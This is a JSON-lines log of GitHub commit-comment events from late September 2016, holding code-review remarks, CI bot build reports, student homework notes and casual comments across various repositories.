{"id":"4640618332","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eef2118/relaxr-landing-page"},"payload":{"comment":{"id":19233964,"position":92,"line":92,"path":"css/style.css","commit_id":"3ec36fab0cfac01c2493127c69e117a1c7663f1c","created_at":"2016-09-29T23:34:44Z","updated_at":"2016-09-29T23:34:44Z","body":"Did you mean \"border-box\"? This is the default box-sizing so no need to set that."}},"created_at":"2016-09-29T23:34:44Z"}
{"id":"4640619017","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eef2118/relaxr-landing-page"},"payload":{"comment":{"id":19233968,"position":103,"line":103,"path":"css/style.css","commit_id":"3ec36fab0cfac01c2493127c69e117a1c7663f1c","created_at":"2016-09-29T23:34:57Z","updated_at":"2016-09-29T23:34:57Z","body":"Did you mean `text-align: center;`?"}},"created_at":"2016-09-29T23:34:57Z"}
{"id":"4640619980","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eef2118/relaxr-landing-page"},"payload":{"comment":{"id":19233970,"position":122,"line":122,"path":"css/style.css","commit_id":"3ec36fab0cfac01c2493127c69e117a1c7663f1c","created_at":"2016-09-29T23:35:13Z","updated_at":"2016-09-29T23:35:13Z","body":"Did you mean `text-align: center;`?"}},"created_at":"2016-09-29T23:35:13Z"}
{"id":"4640622178","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eef2118/relaxr-landing-page"},"payload":{"comment":{"id":19233975,"position":156,"line":156,"path":"css/style.css","commit_id":"3ec36fab0cfac01c2493127c69e117a1c7663f1c","created_at":"2016-09-29T23:35:54Z","updated_at":"2016-09-29T23:35:54Z","body":"Missing a semi-colon and center is not a value for \"float\", it can be \"left\", \"right\" or \"none\"."}},"created_at":"2016-09-29T23:35:54Z"}
{"id":"4640622695","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19233977,"position":null,"line":null,"path":null,"commit_id":"288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2","created_at":"2016-09-29T23:36:03Z","updated_at":"2016-09-29T23:36:03Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-29T23:36:03Z"}
{"id":"4640623184","type":"CommitCommentEvent","actor":{"login":"RoamingCloud"},"repo":{"name":"RoamingCloud/hello-World"},"payload":{"comment":{"id":19233979,"position":null,"line":null,"path":null,"commit_id":"34a037d81c5f9bab7996142224abdcf29b5af52e","created_at":"2016-09-29T23:36:13Z","updated_at":"2016-09-29T23:36:13Z","body":"GitHub test"}},"created_at":"2016-09-29T23:36:13Z"}
{"id":"4640623270","type":"CommitCommentEvent","actor":{"login":"smontana"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19233980,"position":21,"line":61,"path":"docs/extras/faq.md","commit_id":"03ea3bd663bc4a22bd9b51f36d6a105874d14633","created_at":"2016-09-29T23:36:14Z","updated_at":"2016-09-29T23:36:14Z","body":"So, does `3st` stand for `3 * st`?"}},"created_at":"2016-09-29T23:36:14Z"}
{"id":"4640633350","type":"CommitCommentEvent","actor":{"login":"RoamingCloud"},"repo":{"name":"RoamingCloud/hello-World"},"payload":{"comment":{"id":19234010,"position":1,"line":1,"path":"README.md","commit_id":"34a037d81c5f9bab7996142224abdcf29b5af52e","created_at":"2016-09-29T23:39:21Z","updated_at":"2016-09-29T23:39:21Z","body":"`Hello new World!`"}},"created_at":"2016-09-29T23:39:21Z"}
{"id":"4640633554","type":"CommitCommentEvent","actor":{"login":"Gamedev1909"},"repo":{"name":"decaf-emu/decaf-emu"},"payload":{"comment":{"id":19234011,"position":null,"line":null,"path":null,"commit_id":"1574785d0796e36de6fd5901be45aa60b89f3255","created_at":"2016-09-29T23:39:24Z","updated_at":"2016-09-29T23:39:24Z","body":"hey brett it's gamedev here i will be your amd tester feel free to email any new builds and changes to me technewswinandmac@gmail.com"}},"created_at":"2016-09-29T23:39:24Z"}
{"id":"4640635792","type":"CommitCommentEvent","actor":{"login":"dimitry-ishenko"},"repo":{"name":"CasparCG/Server"},"payload":{"comment":{"id":19234012,"position":null,"line":null,"path":null,"commit_id":"61974506572c47b0650c4b5bfa65cd18621d5fec","created_at":"2016-09-29T23:40:07Z","updated_at":"2016-09-29T23:40:07Z","body":"@HellGore thanks for caring about Linux :+1: "}},"created_at":"2016-09-29T23:40:07Z"}
{"id":"4640644308","type":"CommitCommentEvent","actor":{"login":"M4GNV5"},"repo":{"name":"M4GNV5/PointerScript"},"payload":{"comment":{"id":19234041,"position":null,"line":null,"path":null,"commit_id":"9caf4e0938359cd8f84d2c04642d65d53057414e","created_at":"2016-09-29T23:42:43Z","updated_at":"2016-09-29T23:42:43Z","body":"*now supporting $symbols\r\n(zsh ate that)"}},"created_at":"2016-09-29T23:42:43Z"}
{"id":"4640646191","type":"CommitCommentEvent","actor":{"login":"smararu"},"repo":{"name":"smararu/ThirdYearProject"},"payload":{"comment":{"id":19234042,"position":null,"line":null,"path":null,"commit_id":"63cd25d1cc3c0ee15be576c22f16bfe85318fc92","created_at":"2016-09-29T23:43:19Z","updated_at":"2016-09-29T23:43:19Z","body":"I'm so tire I forgot to change the name of the commit :(\r\n"}},"created_at":"2016-09-29T23:43:19Z"}
{"id":"4640648135","type":"CommitCommentEvent","actor":{"login":"SyntaxGC"},"repo":{"name":"iceblade112/GCNet"},"payload":{"comment":{"id":19234046,"position":null,"line":null,"path":null,"commit_id":"c1a21b92e111991e27741729dc8a0dfa921d2672","created_at":"2016-09-29T23:43:52Z","updated_at":"2016-09-29T23:43:52Z","body":"Well, thanks. I just thought that the default keys or anything like could have changed in some season."}},"created_at":"2016-09-29T23:43:52Z"}
{"id":"4640648239","type":"CommitCommentEvent","actor":{"login":"cloud-fan"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19234047,"position":5,"line":604,"path":"sql/core/src/main/scala/org/apache/spark/sql/execution/columnar/ColumnType.scala","commit_id":"85b0a157543201895557d66306b38b3ca52f2151","created_at":"2016-09-29T23:43:53Z","updated_at":"2016-09-29T23:43:53Z","body":"ah, it's not the size stored in unsafe array, but the size in the columnar format.\r\n\r\ncc @kiszk can you fix it? thanks!"}},"created_at":"2016-09-29T23:43:53Z"}
{"id":"4640650565","type":"CommitCommentEvent","actor":{"login":"natemccurdy"},"repo":{"name":"puppetlabs/prosvc-preview_report"},"payload":{"comment":{"id":19234050,"position":null,"line":null,"path":null,"commit_id":"cc5d308f07fc3ffb3fec7bd312dbd27438186387","created_at":"2016-09-29T23:44:36Z","updated_at":"2016-09-29T23:44:36Z","body":"Unfortunately, this causes the script to fail if your system doesn't have any sort of system ruby installed... such as on CentOS 7 out of the box.\r\n\r\nfyi @acidprime "}},"created_at":"2016-09-29T23:44:36Z"}
{"id":"4640653000","type":"CommitCommentEvent","actor":{"login":"Meligy"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":19234057,"position":14,"line":97,"path":"packages/ast-tools/src/route-utils.spec.ts","commit_id":"f6fa1a5218e9b43ab3ce29151a95efe915742562","created_at":"2016-09-29T23:45:21Z","updated_at":"2016-09-29T23:45:21Z","body":"This is an invalid `import` statement, even on Windows, at least VS Code with TypeScript 2 told me so.\r\nThe `\\\\` piece in `level1\\\\level2` should be `/`.\r\n"}},"created_at":"2016-09-29T23:45:21Z"}
{"id":"4640653675","type":"CommitCommentEvent","actor":{"login":"acidprime"},"repo":{"name":"puppetlabs/prosvc-preview_report"},"payload":{"comment":{"id":19234061,"position":null,"line":null,"path":null,"commit_id":"cc5d308f07fc3ffb3fec7bd312dbd27438186387","created_at":"2016-09-29T23:45:35Z","updated_at":"2016-09-29T23:45:35Z","body":"That should just require you add PE ruby to PATH\n\nOn Thursday, September 29, 2016, Nate McCurdy <notifications@github.com>\nwrote:\n\n> Unfortunately, this causes the script to fail if your system doesn't have\n> any sort of system ruby installed... such as on CentOS 7 out of the box.\n>\n> fyi @acidprime <https://github.com/acidprime>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/puppetlabs/prosvc-preview_report/commit/cc5d308f07fc3ffb3fec7bd312dbd27438186387#commitcomment-19234050>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABHmlnaWrC3vaj-kgla8r6DsD8blPNW0ks5qvE1kgaJpZM4KKmFa>\n> .\n>\n"}},"created_at":"2016-09-29T23:45:35Z"}
{"id":"4640669616","type":"CommitCommentEvent","actor":{"login":"Schrotty"},"repo":{"name":"Schrotty/TeamSpeak-Viewer"},"payload":{"comment":{"id":19234108,"position":null,"line":null,"path":null,"commit_id":"45dc68b0cd7ec87fddde2ab55202988f00353f63","created_at":"2016-09-29T23:49:59Z","updated_at":"2016-09-29T23:49:59Z","body":"Stupid idiot! You uploaded a soundpack! Wrong Repo! @Schrotty"}},"created_at":"2016-09-29T23:49:59Z"}
{"id":"4640675966","type":"CommitCommentEvent","actor":{"login":"shane-jones"},"repo":{"name":"shane-jones/Accidental-Astronaut-Demo"},"payload":{"comment":{"id":19234128,"position":null,"line":null,"path":null,"commit_id":"e3afe0a079a647ebfcee2f9246baaabcc97594be","created_at":"2016-09-29T23:51:52Z","updated_at":"2016-09-29T23:51:52Z","body":"None"}},"created_at":"2016-09-29T23:51:52Z"}
{"id":"4640676217","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zap-extensions"},"payload":{"comment":{"id":19234132,"position":4,"line":52,"path":".classpath","commit_id":"c0748de6bbeac84c1a54ebf408b21c70c2122850","created_at":"2016-09-29T23:51:57Z","updated_at":"2016-09-29T23:51:57Z","body":"Isn't that system specific?"}},"created_at":"2016-09-29T23:51:57Z"}
{"id":"4640676419","type":"CommitCommentEvent","actor":{"login":"alexnoox"},"repo":{"name":"maestrano/mno-enterprise-angular"},"payload":{"comment":{"id":19234134,"position":null,"line":null,"path":null,"commit_id":"6b412406393595c29c2bdc97b959a4e58d1dab2e","created_at":"2016-09-29T23:52:01Z","updated_at":"2016-09-29T23:52:01Z","body":"LGTM"}},"created_at":"2016-09-29T23:52:01Z"}
{"id":"4640678171","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234142,"position":1,"line":1,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-29T23:52:31Z","updated_at":"2016-09-29T23:52:31Z","body":"## This assignment illustrates two functions to cache the inverse of a matrix because there may be some \r\n## benefit to caching the inverse of a matrix instead of computing it over and over. \r\n"}},"created_at":"2016-09-29T23:52:31Z"}
{"id":"4640678390","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zap-extensions"},"payload":{"comment":{"id":19234145,"position":13,"line":148,"path":"src/org/zaproxy/zap/extension/ascanrulesBeta/SourceCodeDisclosureCVE20121823.java","commit_id":"c0748de6bbeac84c1a54ebf408b21c70c2122850","created_at":"2016-09-29T23:52:35Z","updated_at":"2016-09-29T23:52:35Z","body":"Attack?"}},"created_at":"2016-09-29T23:52:35Z"}
{"id":"4640680573","type":"CommitCommentEvent","actor":{"login":"thc202"},"repo":{"name":"thc202/zap-extensions"},"payload":{"comment":{"id":19234150,"position":4,"line":52,"path":".classpath","commit_id":"c0748de6bbeac84c1a54ebf408b21c70c2122850","created_at":"2016-09-29T23:53:11Z","updated_at":"2016-09-29T23:53:11Z","body":"Yeah, the source shouldn't be defined."}},"created_at":"2016-09-29T23:53:11Z"}
{"id":"4640682342","type":"CommitCommentEvent","actor":{"login":"jeffgbutler"},"repo":{"name":"mybatis/mybatis-3"},"payload":{"comment":{"id":19234156,"position":null,"line":null,"path":null,"commit_id":"e37d9fb49a3dcb7fa58acd6fc42c71e4d749ebe4","created_at":"2016-09-29T23:53:40Z","updated_at":"2016-09-29T23:53:40Z","body":"@nandctl It looks like you have altered the generated code to add a tableName parameter.  You will also need to modify the generated XML.  For example, ```distinct``` should be changed to ```example.distinct```."}},"created_at":"2016-09-29T23:53:40Z"}
{"id":"4640684590","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19234162,"position":null,"line":null,"path":null,"commit_id":"288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2","created_at":"2016-09-29T23:54:13Z","updated_at":"2016-09-29T23:54:13Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2302 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.19%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T23:54:13Z"}
{"id":"4640685992","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234164,"position":2,"line":1,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-29T23:54:35Z","updated_at":"2016-09-29T23:54:35Z","body":"The first is the makeCacheMatrix.  It is a function that creates a list to \r\n1.\t Set the value of the matrix (changes the vector stored in the main function)\r\n2.\t Get the value of the matrix (returns the vector x stored in the main function)\r\n3.\tSet the value of inverse of the matrix  (stores the value of the input in a variable m)\r\n4.\tGet the value of inverse of the matrix (returns the value of the input in a variable \r\n"}},"created_at":"2016-09-29T23:54:35Z"}
{"id":"4640688008","type":"CommitCommentEvent","actor":{"login":"thc202"},"repo":{"name":"thc202/zap-extensions"},"payload":{"comment":{"id":19234173,"position":4,"line":52,"path":".classpath","commit_id":"c0748de6bbeac84c1a54ebf408b21c70c2122850","created_at":"2016-09-29T23:55:07Z","updated_at":"2016-09-29T23:55:07Z","body":"Removed."}},"created_at":"2016-09-29T23:55:07Z"}
{"id":"4640689920","type":"CommitCommentEvent","actor":{"login":"thc202"},"repo":{"name":"thc202/zap-extensions"},"payload":{"comment":{"id":19234175,"position":13,"line":148,"path":"src/org/zaproxy/zap/extension/ascanrulesBeta/SourceCodeDisclosureCVE20121823.java","commit_id":"c0748de6bbeac84c1a54ebf408b21c70c2122850","created_at":"2016-09-29T23:55:37Z","updated_at":"2016-09-29T23:55:37Z","body":":)"}},"created_at":"2016-09-29T23:55:37Z"}
{"id":"4640693731","type":"CommitCommentEvent","actor":{"login":"MAYAKARYA"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":19234183,"position":null,"line":null,"path":null,"commit_id":"55317817d19dab37cb0c6999468ad0bb7d95a631","created_at":"2016-09-29T23:56:36Z","updated_at":"2016-09-29T23:56:36Z","body":"![m](https://cloud.githubusercontent.com/assets/20342740/18975892/331ed82c-86e0-11e6-8c07-44336611d4a7.jpg)\r\n"}},"created_at":"2016-09-29T23:56:36Z"}
{"id":"4640693737","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234184,"position":4,"line":3,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-29T23:56:37Z","updated_at":"2016-09-29T23:56:37Z","body":"The first is the makeCacheMatrix.  It is a function that creates a list to \r\n1.\tSet the value of the matrix (changes the vector stored in the main function)\r\n2.     Get the value of the matrix (returns the vector x stored in the main function)\r\n3.\tSet the value of inverse of the matrix  (stores the value of the input in a variable m)\r\n4.\tGet the value of inverse of the matrix (returns the value of the input in a variable \r\n\r\nThe second is the CacheSolve which computes the inverse of the special matrix.  If the inverse has already been calculated, then the cachesolve should retrieve the inverse from the cache. \r\n\r\n\r\n\r\n"}},"created_at":"2016-09-29T23:56:37Z"}
{"id":"4640694807","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":19234187,"position":null,"line":null,"path":null,"commit_id":"11ae556f5de378a1ffe4d4592f2a88e98b7a669b","created_at":"2016-09-29T23:56:54Z","updated_at":"2016-09-29T23:56:54Z","body":"Commits for Broken UI in 'no results' scenario for search document\r\nInconsistent UI on settings page\r\nIncorrect column filter is present for 'Author' column on search document page\r\nIncorrect tooltip for all columns on project and document search page\r\nIncorrect functionality of column filter while switching sections\r\nGeneric solution for configuring columns through appsettings for document and document dashboard ."}},"created_at":"2016-09-29T23:56:54Z"}
{"id":"4640695889","type":"CommitCommentEvent","actor":{"login":"Wendy54"},"repo":{"name":"Wendy54/Helllo-World"},"payload":{"comment":{"id":19234192,"position":null,"line":null,"path":null,"commit_id":"1fe15d32cfec9ebb5f06d9e641ac55bdfbcc8bbd","created_at":"2016-09-29T23:57:13Z","updated_at":"2016-09-29T23:57:13Z","body":"I'm confused"}},"created_at":"2016-09-29T23:57:13Z"}
{"id":"4640695943","type":"CommitCommentEvent","actor":{"login":"thc202"},"repo":{"name":"thc202/zap-extensions"},"payload":{"comment":{"id":19234194,"position":13,"line":148,"path":"src/org/zaproxy/zap/extension/ascanrulesBeta/SourceCodeDisclosureCVE20121823.java","commit_id":"c0748de6bbeac84c1a54ebf408b21c70c2122850","created_at":"2016-09-29T23:57:14Z","updated_at":"2016-09-29T23:57:14Z","body":"Fixed."}},"created_at":"2016-09-29T23:57:14Z"}
{"id":"4640696797","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234196,"position":8,"line":7,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-29T23:57:30Z","updated_at":"2016-09-29T23:57:30Z","body":"m <- null\r\n\tset <- function (y) {\r\n\t\tx <<- y\r\n\t\tm <<- null\r\n\t}\r\n\tget <- function() x\r\n\tsetmean <- function(mean) m <<- mean\r\n\tgetmean <- function() m\r\n\tlist(set = set, get = get, setmean = setmean, getmean =  getman)\r\n"}},"created_at":"2016-09-29T23:57:30Z"}
{"id":"4640702754","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234212,"position":6,"line":5,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-29T23:59:21Z","updated_at":"2016-09-29T23:59:21Z","body":"The makeCacheMatrix is a special “matrix” object that can cache its inverse."}},"created_at":"2016-09-29T23:59:21Z"}
{"id":"4640703128","type":"CommitCommentEvent","actor":{"login":"huenato"},"repo":{"name":"huenato/iBlueIt"},"payload":{"comment":{"id":19234216,"position":null,"line":null,"path":null,"commit_id":"afa893971ac565cfd50e4d2c418cdc7f71d3c7ed","created_at":"2016-09-29T23:59:28Z","updated_at":"2016-09-29T23:59:28Z","body":"@atscream02 I don't know. Google it. Or make it yourself. There are some repositories in github with open source code of those addons."}},"created_at":"2016-09-29T23:59:28Z"}
{"id":"4634762240","type":"CommitCommentEvent","actor":{"login":"noraesae"},"repo":{"name":"team-kke/anime"},"payload":{"comment":{"id":19218196,"position":null,"line":null,"path":null,"commit_id":"92067371de02ac9d4247bb7faa7c3ca172d98a78","created_at":"2016-09-29T03:01:07Z","updated_at":"2016-09-29T03:01:07Z","body":"우미 커엽다"}},"created_at":"2016-09-29T03:01:07Z"}
{"id":"4634762981","type":"CommitCommentEvent","actor":{"login":"laijs"},"repo":{"name":"dlespiau/hyperstart"},"payload":{"comment":{"id":19218200,"position":22,"line":1397,"path":"src/init.c","commit_id":"7cf9777f49b011829437b4c2b016c0d0f5ed678e","created_at":"2016-09-29T03:01:22Z","updated_at":"2016-09-29T03:01:22Z","body":"I like the idea from @devimc. In the idea, symlinks are created in the build tools."}},"created_at":"2016-09-29T03:01:22Z"}
{"id":"4634763040","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218201,"position":null,"line":null,"path":null,"commit_id":"656ccd5ab272269c6d8844d0f9b33a17b7666ec8","created_at":"2016-09-29T03:01:24Z","updated_at":"2016-09-29T03:01:24Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T03:01:24Z"}
{"id":"4634763085","type":"CommitCommentEvent","actor":{"login":"brianp1"},"repo":{"name":"brianp1/hw01"},"payload":{"comment":{"id":19218202,"position":null,"line":null,"path":null,"commit_id":"14cfa48425bb912b742ec48ba84e99e227491fdf","created_at":"2016-09-29T03:01:24Z","updated_at":"2016-09-29T03:01:24Z","body":"1. I went to thee CSS git homework 1 page and forked the file that I needed.\r\n2. I went back to my person git page and I cloned/downloaded the URL\r\n3. Open R studio and started a new (version controlled) project. Pasted the URL and nenamed the file HW 1 part 2\r\n4. Edited the read me and saved.\r\n5. Went to the Git section of R studio and clicked Commit.\r\n6. From here I will type out the instructions and push them back to Git where it should pop on my personal Git profile as commits\r\n6b. In order to successfully push, I then need to make a pull request to share my comments and concerns with Dr. Soltoff who can either reject or accept them."}},"created_at":"2016-09-29T03:01:24Z"}
{"id":"4634763258","type":"CommitCommentEvent","actor":{"login":"fredrb"},"repo":{"name":"fredrb/spaceExplorer"},"payload":{"comment":{"id":19218203,"position":null,"line":null,"path":null,"commit_id":"68d8551206062443cda26cd7c7ad8480a260eb2e","created_at":"2016-09-29T03:01:27Z","updated_at":"2016-09-29T03:01:27Z","body":"Closing: #2 "}},"created_at":"2016-09-29T03:01:27Z"}
{"id":"4634764049","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218207,"position":15,"line":60,"path":"src/modulo-01-java-OO/projeto-lotr/DwarfTest.java","commit_id":"33fb52c06e7c6ee6550c6eb9aec39cd9fa00b632","created_at":"2016-09-29T03:01:42Z","updated_at":"2016-09-29T03:01:42Z","body":"Não faz muito sentido colocar esses testes aqui. A lógica de bissexto está toda na classe DataTerceiraEra, deveria ser testado apenas lá, visto que na classe `Dwarf` apenas \"mantemos a referência para objeto Data\". "}},"created_at":"2016-09-29T03:01:42Z"}
{"id":"4634765106","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218212,"position":70,"line":70,"path":"cuongpv/school/application/controllers/Home.php","commit_id":"8a505848a9db5e10ed8733fb9878bcad2fc22999","created_at":"2016-09-29T03:02:04Z","updated_at":"2016-09-29T03:02:04Z","body":"localhost!"}},"created_at":"2016-09-29T03:02:04Z"}
{"id":"4634765532","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218216,"position":null,"line":null,"path":null,"commit_id":"33fb52c06e7c6ee6550c6eb9aec39cd9fa00b632","created_at":"2016-09-29T03:02:13Z","updated_at":"2016-09-29T03:02:13Z","body":"E os outros cenários pertinentes aos exercícios 4 e 5?"}},"created_at":"2016-09-29T03:02:13Z"}
{"id":"4634765717","type":"CommitCommentEvent","actor":{"login":"noraesae"},"repo":{"name":"team-kke/anime"},"payload":{"comment":{"id":19218218,"position":null,"line":null,"path":null,"commit_id":"92067371de02ac9d4247bb7faa7c3ca172d98a78","created_at":"2016-09-29T03:02:16Z","updated_at":"2016-09-29T03:02:16Z","body":"http://i.imgur.com/GYIiFjH.jpg"}},"created_at":"2016-09-29T03:02:16Z"}
{"id":"4634766351","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218222,"position":72,"line":72,"path":"cuongpv/school/application/controllers/Home.php","commit_id":"8a505848a9db5e10ed8733fb9878bcad2fc22999","created_at":"2016-09-29T03:02:29Z","updated_at":"2016-09-29T03:02:29Z","body":"Msg tạo bằng tiếng Anh nhé. \r\n\r\nKhông dùng tiếng Việt (không dấu)"}},"created_at":"2016-09-29T03:02:29Z"}
{"id":"4634766683","type":"CommitCommentEvent","actor":{"login":"vgkholla"},"repo":{"name":"linkedin/ambry"},"payload":{"comment":{"id":19218224,"position":144,"line":1217,"path":"ambry-frontend/src/test/java/com.github.ambry.frontend/AmbryBlobStorageServiceTest.java","commit_id":"350edbcbae1bdc2be2c2786d30a377e024097695","created_at":"2016-09-29T03:02:35Z","updated_at":"2016-09-29T03:02:35Z","body":"missing a \"\\n\""}},"created_at":"2016-09-29T03:02:35Z"}
{"id":"4634767170","type":"CommitCommentEvent","actor":{"login":"laijs"},"repo":{"name":"dlespiau/hyperstart"},"payload":{"comment":{"id":19218225,"position":4,"line":1354,"path":"src/init.c","commit_id":"48e4301aa12b91485b94b6b3dce81c36406ddf91","created_at":"2016-09-29T03:02:45Z","updated_at":"2016-09-29T03:02:45Z","body":"if we also apply @devimc 's idea here, these directories need to be created via the build tools."}},"created_at":"2016-09-29T03:02:45Z"}
{"id":"4634768465","type":"CommitCommentEvent","actor":{"login":"vgkholla"},"repo":{"name":"linkedin/ambry"},"payload":{"comment":{"id":19218228,"position":155,"line":1417,"path":"ambry-frontend/src/test/java/com.github.ambry.frontend/AmbryBlobStorageServiceTest.java","commit_id":"350edbcbae1bdc2be2c2786d30a377e024097695","created_at":"2016-09-29T03:03:10Z","updated_at":"2016-09-29T03:03:10Z","body":"Single line? Perhaps the formatter at fault here?"}},"created_at":"2016-09-29T03:03:10Z"}
{"id":"4634769321","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218230,"position":2,"line":2,"path":"cuongpv/school/public/template/frontend/layout/css/login.css","commit_id":"8a505848a9db5e10ed8733fb9878bcad2fc22999","created_at":"2016-09-29T03:03:29Z","updated_at":"2016-09-29T03:03:29Z","body":"Download về dùng ở server của mình ảnh này đi.\r\nNhỡ họ xoá ảnh thì sao. "}},"created_at":"2016-09-29T03:03:29Z"}
{"id":"4634771155","type":"CommitCommentEvent","actor":{"login":"zhuyajun1111"},"repo":{"name":"zhuyajun1111/s10-demo"},"payload":{"comment":{"id":19218233,"position":null,"line":null,"path":null,"commit_id":"7a181c693d305f72a87b134898154044fc786f1d","created_at":"2016-09-29T03:04:06Z","updated_at":"2016-09-29T03:04:06Z","body":"顶顶顶顶顶顶顶顶顶顶"}},"created_at":"2016-09-29T03:04:06Z"}
{"id":"4634771838","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218236,"position":18,"line":18,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"12d36e7742ef5d8fd656ba3be06aa34533815485","created_at":"2016-09-29T03:04:21Z","updated_at":"2016-09-29T03:04:21Z","body":"⚠️ ⚠️ ⚠️ \r\nCuidado. Precisamos ter consistência nos idiomas. Português ou inglês. Os dois não."}},"created_at":"2016-09-29T03:04:21Z"}
{"id":"4634771961","type":"CommitCommentEvent","actor":{"login":"zhuyajun1111"},"repo":{"name":"zhuyajun1111/s10-demo"},"payload":{"comment":{"id":19218237,"position":null,"line":null,"path":null,"commit_id":"7a181c693d305f72a87b134898154044fc786f1d","created_at":"2016-09-29T03:04:23Z","updated_at":"2016-09-29T03:04:23Z","body":"顶顶顶顶顶顶顶顶顶顶顶顶顶"}},"created_at":"2016-09-29T03:04:23Z"}
{"id":"4634772349","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218238,"position":18,"line":18,"path":"cuongpv/school/application/views/frontend/layout/thongtin.php","commit_id":"ddc7ad820a757e66a4aa178fb1486d1fac3ba847","created_at":"2016-09-29T03:04:31Z","updated_at":"2016-09-29T03:04:31Z","body":"Cường thử dùng bootstrap sẽ thấy làm nhanh hơn, không phải viết PHP thuần thế này. "}},"created_at":"2016-09-29T03:04:31Z"}
{"id":"4634772561","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-portfolio"},"payload":{"comment":{"id":19218239,"position":317,"line":317,"path":"Assignment Week 8/css/style.css","commit_id":"9fae075db5d868fba132aa40967ab8383a8424c4","created_at":"2016-09-29T03:04:35Z","updated_at":"2016-09-29T03:04:35Z","body":"Wow, great job going for the bonus and making your form responsive!"}},"created_at":"2016-09-29T03:04:35Z"}
